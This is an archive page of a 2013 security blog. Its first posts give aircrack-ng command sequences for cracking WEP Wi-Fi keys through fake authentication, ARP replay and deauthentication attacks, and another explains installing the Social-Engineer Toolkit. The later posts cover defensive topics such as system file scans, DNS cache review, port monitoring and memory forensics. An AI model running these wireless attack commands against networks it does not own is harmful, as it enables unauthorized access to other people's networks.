May
19
2013

WEP Fake Authentication Attack

Wep Fake Authentication attack with aircrack-ng suite.

Place your wireless card into Monitor Mode

airmon-ng start wlan0

Detect all available wireless AP’s and clients

airodump-ng mon0

Setting adapter channel

iwconfig mon0 channel <channel_number>

Capturing

airodump-ng --channel <channel_number> --bssid <bssid> --write capture mon0

no connected clients are present, we use fake authentication attack

aireplay-ng --fakeauth 1000 -q 10 -a <bssid> -h <source_mac_address> mon0

–fakeauth use fake authentication attack with a delay of 1000 milliseconds
-q 10 send keepalives every 10 seconds

Launch ARP replay attack

aireplay-ng --arpreplay -b <bssid> -h <source_mac_address> mon0

Launch ARP replay attack

aireplay-ng --arpreplay -b <bssid> -h <source_mac_address> mon0

Producing a WEP key

aircrack-ng capture-01.cap

 

Tags: , , ,
Posted in Cracking, Network, Wireless | No Comments »

May
10
2013

WEP De-athentication attack

Wep de-authentication attack with aircrack-ng suite.

Place your wireless card into Monitor Mode

airmon-ng start wlan0

Detect all available wireless AP’s and clients

airodump-ng mon0

Setting adapter channel

iwconfig mon0 channel <channel_number>

De-authentication attack

aireplay-ng --deauth 3 -a <BSSID> -c <client_mac> mon0

Capturing and cracking (open new console window)

airodump-ng --channel <channel_number> --write capture mon0

 
 

Tags: , , , , , , , ,
Posted in Cracking, Wireless | No Comments »

May
06
2013

Social-Engineer Toolkit on Windows

To install the latest Social-Engineer Toolkit (SET) release follow these steps under Windows:

1. Download and install GitHub for Windows.

2. Clone SET git repository from https://github.com/trustedsec/social-engineer-toolkit/.

3. Download and install PyCrypto library. Download Prebuilt binaries for Windows from Voidspace site.

4. Open your cmd and run Social-Engineer Toolkit:

python C:\Users\<username>\Documents\GitHub\social-engineer-toolkit\se-toolkit

 
 

Tags: , , , , , , ,
Posted in Social Engineering, Tools | No Comments »

May
04
2013

Scan the integrity of all protected Windows 7 system files

Open an elevated command prompt.

To do this, click Start, click All Programs, click Accessories, right-click Command Prompt, and then click Run as administrator. If you are prompted for an administrator password or for a confirmation, type the password, or click Allow.

At the command prompt, type the following command, and then press ENTER:

sfc /scannow

The sfc /scannow command scans all protected system files and replaces incorrect versions with correct Microsoft versions.

For more..

Tags: , , , , , ,
Posted in Detection, Integrity, Tools, Windows | No Comments »

Apr
29
2013

Inspect cached DNS requests for any suspicious activity

You can dump the cached DNS requests and examine each entry for any strange or suspicious request. All you need is the cmd.exe and ipconfig.exe.

ipconfig /displaydns > output.txt

Tags: , , , , ,
Posted in Detection, Tools | No Comments »

Apr
27
2013

Monitoring Opened TCP/IP network ports/connections in Linux

tcptrack displays the status of TCP connections that it sees on a given network interface. tcptrack monitors their state and displays information such as state, source/destination addresses and bandwidth usage in a sorted, updated list very much like the top command.

The filter expression is a standard pcap filter expression (identical to the expressions used by tcpdump) which can be used to filter down the characteristics of TCP connections that tcptrack will see.

Execute:

tcptrack -h

for help

Basic Usage:

tcptrack -i eth0

Tags: , , , , , ,
Posted in Linux, Monitor, Network | No Comments »

Apr
26
2013

Monitoring Opened TCP/IP network ports / connections

CurrPorts is network monitoring software that displays the list of all currently opened TCP/IP and UDP ports on your local computer.

For each port in the list, information about the process that opened the port is also displayed, including the process name, full path of the process, version information of the process (product name, file description, and so on), the time that the process was created, and the user that created it.

In addition, CurrPorts allows you to close unwanted TCP connections, kill the process that opened the ports, and save the TCP/UDP ports information to HTML file , XML file, or to tab-delimited text file.

CurrPorts also automatically mark with pink color suspicious TCP/UDP ports owned by unidentified applications (Applications without version information and icons).

 

For more visit Nirsoft web site.

Download CurrPorts from here, there is also a x64 version.

 

 

Tags: , , , , , , , ,
Posted in Monitor, Network | No Comments »

Apr
19
2013

Forensic Toolkit for Memory Capturing & Analysis

To analyze a compromised computer or analyze the behavior of malware you will need tools like FTK Imager. You can perform memory dump of the compromised machine and export it to external storage device, extract process-related information from memory snapshots, threads, strings, dependencies and communications.

 

You can also examine Windows operating system files such as Pagefile.sys where virtual memory is stored and Hiberfil.sys where in-memory data are stored while the system is in Hibernation mode. Both files are hidden and in use by the OS. With FTK you can copy these files and examine them.

 

You will find it in AccessData’s site. Download

 

 

Tags: , , , , ,
Posted in Auditing, Penetration Testing | No Comments »

Apr
19
2013

Definitions

security incident

(I) A security event that involves a security violation.

(C) In other words, a security-relevant system event in which the system’s security policy is disobeyed or otherwise breached.

(O) “Any adverse event which compromises some aspect of computer or network security.”

security event

(I) A occurrence in a system that is relevant to the security of the system.

security intrusion

(I) A security event, or a combination of multiple security events, that constitutes a security incident in which an intruder

gains, or attempts to gain, access to a system (or system resource) without having authorization to do so.

security violation

(I) An act or event that disobeys or otherwise breaches security policy.

 

https://www.ietf.org/rfc/rfc2828.txt

 

Tags:
Posted in General | No Comments »

Apr
16
2013

Global WordPress brute force attack

The last few days there is an on-going and highly-distributed, global attack on WordPress installations across virtually every web host in existence.  This attack is well organized and distributed.

http://blog.hostgator.com/2013/04/11/global-wordpress-brute-force-flood/

http://blog.cloudflare.com/patching-the-internet-fixing-the-wordpress-br

To protect your blog,

  1. remove default admin account and create a new one with a different username
  2. change your administrator password
  3. install a captcha plugin

How to select a secure password from WordPress

Tags: , , , ,
Posted in Brute-force, News | No Comments »

« Older Entries